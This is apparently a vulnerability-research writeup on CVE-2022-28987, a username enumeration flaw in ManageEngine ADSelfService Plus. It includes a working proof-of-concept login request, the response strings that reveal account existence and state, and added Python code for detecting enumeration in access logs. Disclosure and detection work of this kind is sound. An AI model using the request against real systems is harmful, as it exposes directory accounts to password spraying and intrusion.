CVE-2022-28987: vulnerability-research/adselfservice-userenum.md at main · passtheticket/vulnerability-research

ManageEngine ADSelfService Plus v6.1 allows attackers to perform username enumeration via a crafted POST request to /ServletAPI/accounts/login.


Zoho ManageEngine ADSelfService Plus 6121 Username Enumeration

  • Version: 6.1 Build 6121
  • Tested against: ADSelfService 6118 - 6121

Domain usernames (sAMAccountName values) can be enumerated through the application: whether a domain user is enrolled in ADSelfService Plus, and the state of that account, can be inferred from the application's response.

The vulnerability is triggered by sending the following POST request:

PoC HTTP Request:

POST /ServletAPI/accounts/login HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 23
DNT: 1
Connection: close
Sec-GPC: 1

loginName=USERNAME

Administrator, krbtgt and Guest are default accounts in Active Directory; krbtgt and Guest are disabled by default.

  • If the user does not exist, the response is "eSTATUS":"Permission Denied. Kindly contact your Administrator."
  • If the user exists, the response is "LOGIN_STATUS":"PASSWORD","WELCOME_NAME":"{Username}"
  • If the user is disabled (for example Guest or krbtgt), the response is "eSTATUS":"Your account has been disabled. Please see your system administrator."
  • If the user has expired, the response is "eSTATUS":"Your account has expired. Please see your system administrator."
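Because every probe is a normal-looking POST to the login endpoint, the defender-side signal is volume of distinct loginName values per client rather than any single request. The following detection is an added example, not code from the original writeup: it scans constructed access-log lines (the log format, the 10.0.0.x clients and the threshold are assumptions) for clients that submit many distinct loginName values to /ServletAPI/accounts/login within a short window.

```python
"""Flag clients enumerating usernames against the ADSelfService Plus login endpoint."""
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs

LOGIN_PATH = "/ServletAPI/accounts/login"  # endpoint named in CVE-2022-28987

# Constructed sample log (hypothetical format: time client method path body).
# 10.0.0.5 walks through account names; 10.0.0.9 is a user retrying one login.
SAMPLE_LOG = """\
2022-04-28T10:00:01Z 10.0.0.5 POST /ServletAPI/accounts/login loginName=administrator
2022-04-28T10:00:02Z 10.0.0.5 POST /ServletAPI/accounts/login loginName=guest
2022-04-28T10:00:02Z 10.0.0.5 POST /ServletAPI/accounts/login loginName=krbtgt
2022-04-28T10:00:03Z 10.0.0.5 POST /ServletAPI/accounts/login loginName=jsmith
2022-04-28T10:00:04Z 10.0.0.5 POST /ServletAPI/accounts/login loginName=jdoe
2022-04-28T10:00:05Z 10.0.0.5 POST /ServletAPI/accounts/login loginName=svc_backup
2022-04-28T10:00:07Z 10.0.0.9 POST /ServletAPI/accounts/login loginName=mwilson
2022-04-28T10:00:40Z 10.0.0.9 POST /ServletAPI/accounts/login loginName=MWilson
2022-04-28T10:01:10Z 10.0.0.9 GET /ServletAPI/accounts/login -
2022-04-28T10:05:00Z 10.0.0.7 POST /ServletAPI/accounts/login loginName=alice
2022-04-28T10:20:00Z 10.0.0.7 POST /ServletAPI/accounts/login loginName=bob
"""


def find_enumerators(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {client: n} for clients that tried at least `threshold` distinct
    loginName values against LOGIN_PATH inside any `window`-long interval."""
    attempts = defaultdict(list)  # client -> [(timestamp, normalised loginName)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, path, body = line.split(" ", 4)
        if method != "POST" or path != LOGIN_PATH:
            continue
        names = parse_qs(body).get("loginName")  # absent/blank -> None
        if names:
            when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
            attempts[client].append((when, names[0].lower()))  # case-insensitive

    flagged = {}
    for client, events in attempts.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over sorted events
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {name for _, name in events[start:end + 1]}
            if len(distinct) >= threshold:
                flagged[client] = max(flagged.get(client, 0), len(distinct))
    return flagged
```

Run over the sample, only 10.0.0.5 is flagged (6 distinct names in 4 seconds); the retrying user and the two logins 15 minutes apart stay below threshold.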
